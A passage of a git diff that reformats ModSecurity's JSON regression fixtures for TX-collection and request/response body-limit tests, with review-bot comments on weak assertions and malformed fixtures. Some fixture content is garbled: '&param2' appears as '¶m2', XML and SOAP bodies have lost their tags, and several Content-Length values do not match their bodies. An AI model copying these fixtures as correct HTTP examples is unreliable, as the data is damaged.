\\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", 
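Review bot: The first case, "Collection :: TX full vs partial match", asserts only `"http_code": 200`, which is presumably also what the harness reports when the chained rule is never evaluated, so it cannot tell a correct non-match of `TX.partial` from a rule that did not run. Consider adding a `debug_log` expectation to this case, or a sibling case whose second rule targets `TX.partial_match` and expects the request to be blocked, so the negative result is paired with a positive one. The last test object in this hunk continues past its end.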
@@ -214,58 +219,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " 
\n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"15\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"15\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", 
@@ -274,59 +280,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", - "Cookie2":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", + "Cookie2": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + 
"response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"40\" \\(Variable: TX:anomaly_score\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"40\" \\(Variable: TX:anomaly_score\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,setvar:tx.critical_anomaly_score=5\"", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:2,setvar:tx.anomaly_score=10\"", diff --git a/test/test-cases/regression/config-body_limits.json b/test/test-cases/regression/config-body_limits.json index b4e84517f5..da3e836c9e 100644 --- a/test/test-cases/regression/config-body_limits.json +++ b/test/test-cases/regression/config-body_limits.json 
@@ -1,106 +1,112 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ +[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction ProcessPartial", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
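Review bot: The multipart request body that starts at the end of this hunk (`"--------------------------756b6d74fa1a8ee2"`, `"Content-Disposition: form-data; name=\"name\""`, `""`) has no line terminators on the lines visible here, and the harness change earlier in this series no longer appends one. If the rest of the array is the same, the body is now a single unbroken line rather than a multipart message; the case still returns 403 only because `SecRequestBodyLimit 5` rejects on size. Ending each element with `\r\n` (for example `"--------------------------756b6d74fa1a8ee2\r\n"`) would keep the fixture a well-formed upload; the same body recurs in the other SecRequestBodyLimitAction cases below. Separately, the two json `SecRequestBodyNoFilesLimit` cases further down declare `"Content-Length": "41"` for a 48-byte body, where `"48"` would match.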
@@ -118,47 +124,47 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -176,47 +182,47 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -234,46 +240,46 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -291,146 +297,152 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction ProcessPartial", "SecRequestBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", 
@@ -438,45 +450,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 60", 
@@ -484,46 +496,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", 
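Review bot: The `"Content-Length": "41"` header in the "json, limit exceeded" case does not match the JSON body sent with it, which is 48 bytes as written. The test therefore cannot show whether SecRequestBodyNoFilesLimit is enforced against the declared length or against the bytes actually received. Both 41 and 48 exceed the limit of 20 here, and both stay under the limit of 80 in the following "json, limit not exceeded" hunk, which carries the same header. Since this series is about making request-body bytes exact, I would change both cases to `"Content-Length": "48"`. The rules array of this case continues past the end of the hunk.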
@@ -532,45 +544,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", 
@@ -579,47 +591,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", 
@@ -628,46 +640,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit not exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 90", 
